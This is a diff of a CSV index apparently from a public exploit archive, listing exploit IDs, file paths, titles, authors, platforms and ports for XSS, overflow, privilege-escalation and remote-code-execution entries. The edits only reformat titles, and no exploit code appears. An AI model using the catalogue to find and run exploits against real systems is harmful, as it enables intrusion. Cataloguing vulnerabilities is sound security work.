id,file,description,date,author,platform,type,port 21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 -21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 +21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post - Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local,0 21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack",2002-06-28,"Charles Stevenson",linux,local,0 21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,unix,remote,0 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 -21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 +21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 @@ -19021,15 +19021,15 @@ id,file,description,date,author,platform,type,port 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",php,webapps,0 21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 -21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 +21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 XML Redirect File Disclosure",2002-08-23,"GreyMagic Software",windows,remote,0 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant",2002-04-16,"GreyMagic Software",windows,remote,0 -21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 +21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0 21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 test.php Sample Application XSS",2002-08-26,"Matthew Murphy",windows,remote,0 21754,platforms/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 test.shtml Sample Application XSS",2002-08-26,"Matthew Murphy",windows,remote,0 21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0 -21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 +21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 21757,platforms/windows/remote/21757.txt,"OmniHTTPD 1.1/2.0.x/2.4 Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 21758,platforms/unix/local/21758.txt,"Caldera X Server 7.1/8.0 - External Program Privileged Invocation Weakness",2002-08-27,"Olaf Kirch",unix,local,0 21759,platforms/windows/remote/21759.txt,"mIRC 6.0 Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 @@ -19049,8 +19049,8 @@ id,file,description,date,author,platform,type,port 21773,platforms/unix/local/21773.pl,"HP Tru64 NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,unix,local,0 21774,platforms/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,unix,local,0 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service",2002-09-02,saman,linux,dos,0 -21776,platforms/php/webapps/21776.txt,"PHP 4.2.3 Header Function Script Injection",2002-09-07,"Matthew Murphy",php,webapps,0 -21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0 +21776,platforms/php/webapps/21776.txt,"PHP 4.2.3 - Header Function Script Injection",2002-09-07,"Matthew Murphy",php,webapps,0 +21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0 21778,platforms/php/webapps/21778.txt,"phpGB 1.x - SQL Injection",2002-09-09,ppp-design,php,webapps,0 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 @@ -19063,7 +19063,7 @@ id,file,description,date,author,platform,type,port 21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Local Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 21792,platforms/windows/dos/21792.txt,"Savant Webserver 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 -21793,platforms/linux/local/21793.txt,"BRU 17.0 XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local,0 +21793,platforms/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local,0 21794,platforms/windows/remote/21794.txt,"Savant Webserver 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote,0 21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 @@ -19087,7 +19087,7 @@ id,file,description,date,author,platform,type,port 21814,platforms/linux/local/21814.c,"Alsaplayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 -21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 +21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 21819,platforms/windows/dos/21819.c,"Trillian 0.74 IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure",2002-10-01,"HP Security",unix,remote,0 @@ -19108,23 +19108,23 @@ id,file,description,date,author,platform,type,port 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 -21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 -21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 +21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 +21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary Upload Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 -21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 +21839,platforms/windows/remote/21839.rb,"NTR - ActiveX Control StopModule() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 -21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,Metasploit,windows,remote,0 +21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control Check() Method Buffer Overflow",2012-10-10,Metasploit,windows,remote,0 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 -21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 +21843,platforms/windows/local/21843.rb,"Windows - Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 21844,platforms/windows/local/21844.rb,"Microsoft Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 -21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 +21845,platforms/windows/local/21845.rb,"Windows - Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,Metasploit,java,remote,7001 -21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",2012-10-10,Metasploit,windows,remote,0 +21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution",2012-10-10,Metasploit,windows,remote,0 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,Metasploit,linux,local,0 -21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog Command Execution",2012-10-10,Metasploit,unix,remote,444 +21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution",2012-10-10,Metasploit,unix,remote,444 21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,Metasploit,linux,remote,0 21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,Metasploit,unix,remote,10000 -21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution",2012-10-10,Metasploit,unix,remote,0 +21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution",2012-10-10,Metasploit,unix,remote,0 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 21855,platforms/php/webapps/21855.txt,"PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting",2002-09-24,"Mark Grimes",php,webapps,0 @@ -19140,8 +19140,8 @@ id,file,description,date,author,platform,type,port 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 -21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 +21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 +21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 21870,platforms/linux/remote/21870.txt,"Zope 2.x - Incorrect XML-RPC Request Information Disclosure",2002-09-26,"Rossen Raykov",linux,remote,0 21871,platforms/linux/local/21871.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local,0 21872,platforms/linux/local/21872.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local,0 @@ -19150,18 +19150,18 @@ id,file,description,date,author,platform,type,port 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps,0 21876,platforms/multiple/remote/21876.txt,"SafeTP 1.46 Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",multiple,remote,0 21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 Web Root Path Disclosure",2002-09-29,FVS,cgi,webapps,0 -21878,platforms/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form Script Injection",2002-09-29,FVS,cgi,webapps,0 +21878,platforms/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form - Script Injection",2002-09-29,FVS,cgi,webapps,0 21879,platforms/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal",2002-09-30,"ET LoWNOISE",java,webapps,0 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 -21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution",2012-10-11,Metasploit,windows,remote,0 +21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution",2012-10-11,Metasploit,windows,remote,0 21889,platforms/windows/dos/21889.pl,"VLC Player 2.0.3 - (.png) ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 Config.INC Information Disclosure",2002-10-02,frog,php,webapps,0 21894,platforms/php/webapps/21894.txt,"Midicart PHP Information Disclosure",2002-10-02,frog,php,webapps,0 -21895,platforms/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine Arbitrary Command Execution",2002-10-02,"Matt Moore",cgi,webapps,0 -21896,platforms/php/webapps/21896.txt,"Midicart PHP Arbitrary File Upload",2002-10-02,frog,php,webapps,0 +21895,platforms/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution",2002-10-02,"Matt Moore",cgi,webapps,0 +21896,platforms/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,php,webapps,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 Article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 @@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 -21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload",2012-10-16,Metasploit,php,webapps,0 +21929,platforms/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload",2012-10-16,Metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 Add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 @@ -19246,17 +19246,17 @@ id,file,description,date,author,platform,type,port 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0 -21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 +21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 21984,platforms/unix/dos/21984.c,"QNX 6.1 TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0 21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 - (.avi) Integer Division By Zero Crash PoC",2012-10-15,Dark-Puzzle,windows,dos,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps,0 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 -21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 m2p quartz.dll Heap Pointer Overwrite PoC",2012-10-15,"James Ritchey",windows,dos,0 +21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p quartz.dll Heap Pointer Overwrite PoC",2012-10-15,"James Ritchey",windows,dos,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 -21993,platforms/php/remote/21993.rb,"AjaXplorer checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 -21994,platforms/windows/local/21994.rb,"Windows Escalate Service Permissions Local Privilege Escalation",2012-10-16,Metasploit,windows,local,0 +21993,platforms/php/remote/21993.rb,"AjaXplorer - checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 +21994,platforms/windows/local/21994.rb,"Windows - Escalate Service Permissions Local Privilege Escalation",2012-10-16,Metasploit,windows,local,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 Non-existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 @@ -19304,7 +19304,7 @@ id,file,description,date,author,platform,type,port 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x - members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 -22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0 +22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 - Script Injection",2002-11-25,"Pete Foster",php,webapps,0 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,php,webapps,0 22045,platforms/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps,0 22046,platforms/linux/remote/22046.c,"Null HTTPD 0.5 - Remote Heap Corruption",2002-11-26,eSDee,linux,remote,0 @@ -19348,8 +19348,8 @@ id,file,description,date,author,platform,type,port 22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 PHPInfo.php Information Disclosure",2002-12-12,euronymous,php,webapps,0 22087,platforms/php/webapps/22087.txt,"Mambo Site Server 4.0.11 - Path Disclosure",2002-12-12,euronymous,php,webapps,0 22088,platforms/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,php,webapps,0 -22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 -22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 +22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 - Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 +22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 - Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0 22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Path Traversal",2012-10-19,xistence,multiple,webapps,0 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 @@ -19407,7 +19407,7 @@ id,file,description,date,author,platform,type,port 22147,platforms/linux/remote/22147.c,"mpg123 pre0.59s Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",linux,remote,0 22148,platforms/php/webapps/22148.txt,"phpPass 2 AccessControl.php SQL Injection",2003-01-13,frog,php,webapps,0 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - index.php bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 -22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 +22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 modules.php file Parameter Traversal - Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en Stored XSS",2012-10-22,sqlhacker,php,webapps,0 22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - (index.php task parameter) SQL Injection",2012-10-22,D4NB4R,php,webapps,0 @@ -19418,7 +19418,7 @@ id,file,description,date,author,platform,type,port 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 -22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,Metasploit,windows,remote,21 +22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow",2012-10-23,Metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DoS",2003-01-13,"Pavel P",windows,dos,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - Profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 @@ -19440,10 +19440,10 @@ id,file,description,date,author,platform,type,port 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 -22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 +22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 -22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 +22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD save_item.php - Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 @@ -19459,8 +19459,8 @@ id,file,description,date,author,platform,type,port 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 